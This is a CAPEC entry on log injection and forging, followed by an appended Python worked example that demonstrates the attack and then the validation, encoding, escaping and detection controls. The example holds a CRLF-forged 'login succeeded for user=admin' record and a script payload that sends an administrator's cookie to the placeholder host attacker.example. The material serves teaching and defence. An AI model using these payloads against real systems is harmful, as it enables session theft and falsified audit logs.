CAPEC-93 - Log Injection-Tampering-Forging

This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover the traces of an attack, or perform other malicious actions. The target host does not properly control access to the logs or the content that reaches them. As a result, tainted data ends up in the log files, defeating accountability, non-repudiation and incident forensics.


  • Attack Methods (3): Analysis, Modification of Resources, Injection
  • Purposes (1): Obfuscation
  • Security Principles (1): Reluctance to Trust
  • Scopes (1): Modify application data (Integrity)

Low level: This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.

Medium level: A more sophisticated attack can try to defeat the input validation mechanism.

The target host is logging the action and data of the user.

The target host insufficiently protects access to the logs or logging mechanisms.

The attacker will try to determine which data is logged on success or failure of a predetermined action such as authentication. Once that data has been identified, the attacker may craft malicious data to inject through it.

A vulnerability testing tool can be used to probe the input validation mechanism.

Step 1 - Determine Application's Log File Format

The first step is exploratory: the attacker observes the system, looking for actions and data that are likely to be logged. The attacker may already be familiar with the log format of the system.

Technique ID: 1 - Environment(s) env-All

Determine logging utility being used by application (e.g. log4j)

Technique ID: 2 - Environment(s) env-All

Gain access to application's source code to determine log file formats.

Technique ID: 3 - Environment(s) env-All

Install or obtain access to instance of application and observe its log file format.

Outcome ID: 1

Type: Success

Attacker determines log file format used by application.

Outcome ID: 2

Type: Inconclusive

Attacker cannot conclusively determine log file format; he/she can only guess what the format is.



Step 2 - Manipulate Log Files

The attacker alters the log contents either directly, by manipulating or forging the log file, or indirectly, by injecting specially crafted input that the target software writes to the logs. This type of attack typically follows another attack and is used to cover the traces of the previous one.

Technique ID: 1 - Environment(s) env-All

Use carriage return and/or line feed characters to start a new line in the log file, and then add a fake entry. For example:

Technique ID: 2 - Environment(s) env-All

Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain

Security Control ID: 1

Type: Preventative

Input validation to ensure that only legal characters supplied by users can be entered into log files.

Security Control ID: 2

Type: Preventative

Encode information from user such that any unexpected characters are encoded safely before they are entered into log files.

Security Control ID: 3

Type: Preventative

Post-processing of log files to remove or encode dangerous characters before displaying to a user may help in some cases. It will not help remove fake log entries entered using carriage return and line feed characters, however.


Outcome ID: 1

Type: Success

Forged entry or other malicious data inserted into application's logs.

Outcome ID: 2

Type: Failure

No entry inserted into logs, or the entry is visibly distinguishable from real entries.
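Worked example (added here; it is not part of the CAPEC entry and not any project's code): a small Python script that runs Step 2, Technique 1 (a CRLF-forged entry) and Technique 2 (a script aimed at a browser-based log viewer) against an unsanitized logger, then applies Security Controls 1 to 3 (allowlist validation, encoding before logging, HTML-encoding on display) and finishes with a detection pass over an existing log that illustrates Outcome 2. The login endpoint, the one-line log format, the attacker inputs and the attacker.example host are all constructed for the example.

```python
"""CAPEC-93 worked example (added here, not CAPEC's own code).

A hypothetical login endpoint writes one audit record per attempt in the
constructed format "<timestamp> <level> login <result> for user=<name>".
The block shows Step 2, Technique 1 (CRLF-forged entry) and Technique 2
(script aimed at a browser log viewer) against an unsanitized logger, then
the three security controls (allowlist validation, output encoding,
HTML-escaping on display) and a detection pass over an existing log.
"""
import html
import re

LOG_FORMAT = "{ts} {level} login {result} for user={user}"  # constructed format

# Constructed attacker inputs, submitted in the username field of a login form.
FORGED_USER = "eve\r\n2024-01-01 00:00:01 INFO login succeeded for user=admin"
XSS_USER = ("bob<script>new Image().src='http://attacker.example/?c='"
            "+document.cookie</script>")  # attacker.example is a placeholder

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
USERNAME_ALLOWLIST = re.compile(r"[A-Za-z0-9._-]{1,32}")


def vulnerable_log_line(ts, level, result, user):
    """Weak form: the user-supplied string is written verbatim, so CR/LF in
    it terminates the record and whatever follows becomes a new record."""
    return LOG_FORMAT.format(ts=ts, level=level, result=result, user=user)


def validate_username(user):
    """Security Control 1: allowlist validation. Only names made of the
    permitted characters are accepted, so CR, LF and '<' never reach the
    logger (or anything else) in the first place."""
    return USERNAME_ALLOWLIST.fullmatch(user) is not None


def encode_for_log(value):
    """Security Control 2: encode rather than reject. Backslash is doubled
    first, then every ASCII control character becomes a visible \\xNN
    escape, so one record can never span lines or drive a terminal."""
    value = value.replace("\\", "\\\\")
    return CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group(0)), value)


def safe_log_line(ts, level, result, user):
    """Hardened form of vulnerable_log_line: the user field is encoded before
    it is placed in the record."""
    return LOG_FORMAT.format(ts=ts, level=level, result=result,
                             user=encode_for_log(user))


def render_for_browser(log_text):
    """Security Control 3: HTML-encode before a web-based viewer displays the
    log, so a logged <script> tag is shown rather than executed. As the
    CAPEC text notes, this does nothing against an entry already forged
    with CR/LF; it only protects the viewer."""
    return html.escape(log_text, quote=True)


LINE_SHAPE = re.compile(
    r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} (INFO|WARNING|ERROR) login "
    r"(succeeded|failed) for user=[A-Za-z0-9._-]{1,32}"
)


def audit_log(log_text):
    """Detection pass over an existing log. Returns (line number, reason)
    for records that contain a raw control character or do not match the
    expected shape. A forged record that copies the shape exactly is NOT
    caught; only the artifact the injection leaves behind (a stray CR at
    the end of the previous record) is, which is why prevention matters."""
    findings = []
    for lineno, line in enumerate(log_text.split("\n"), start=1):
        if line == "":          # a trailing newline is normal
            continue
        if CONTROL_CHARS.search(line):
            findings.append((lineno, "control character in record"))
        elif LINE_SHAPE.fullmatch(line) is None:
            findings.append((lineno, "record does not match log format"))
    return findings


if __name__ == "__main__":
    ts = "2024-01-01 00:00:00"
    print("--- vulnerable logger, forged entry ---")
    print(vulnerable_log_line(ts, "INFO", "failed", FORGED_USER))
    print("--- hardened logger, same input ---")
    print(safe_log_line(ts, "INFO", "failed", FORGED_USER))
    print("--- web viewer, script in log ---")
    print(render_for_browser(vulnerable_log_line(ts, "INFO", "failed", XSS_USER)))
    print("--- audit of the vulnerable log ---")
    print(audit_log(vulnerable_log_line(ts, "INFO", "failed", FORGED_USER)))
```

Run the file directly to see the four stages. With the vulnerable logger the forged second record is byte-for-byte a legitimate-looking "login succeeded for user=admin" line, and the audit pass only flags the stray carriage return left on the record before it. With the hardened logger the same input stays on one line and the injected text is visibly distinguishable (the CR and LF appear as \x0d and \x0a), which is the failure outcome from the attacker's point of view. Allowlist validation at the input boundary is the stronger of the two preventive controls where the field has a known alphabet; encoding is the fallback for free-form fields; HTML escaping belongs in the viewer and addresses only Technique 2.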



Carefully control access to physical log files.

Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data.

Use synchronization to control the flow of execution.

Use static analysis tools to identify log forging vulnerabilities.

Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.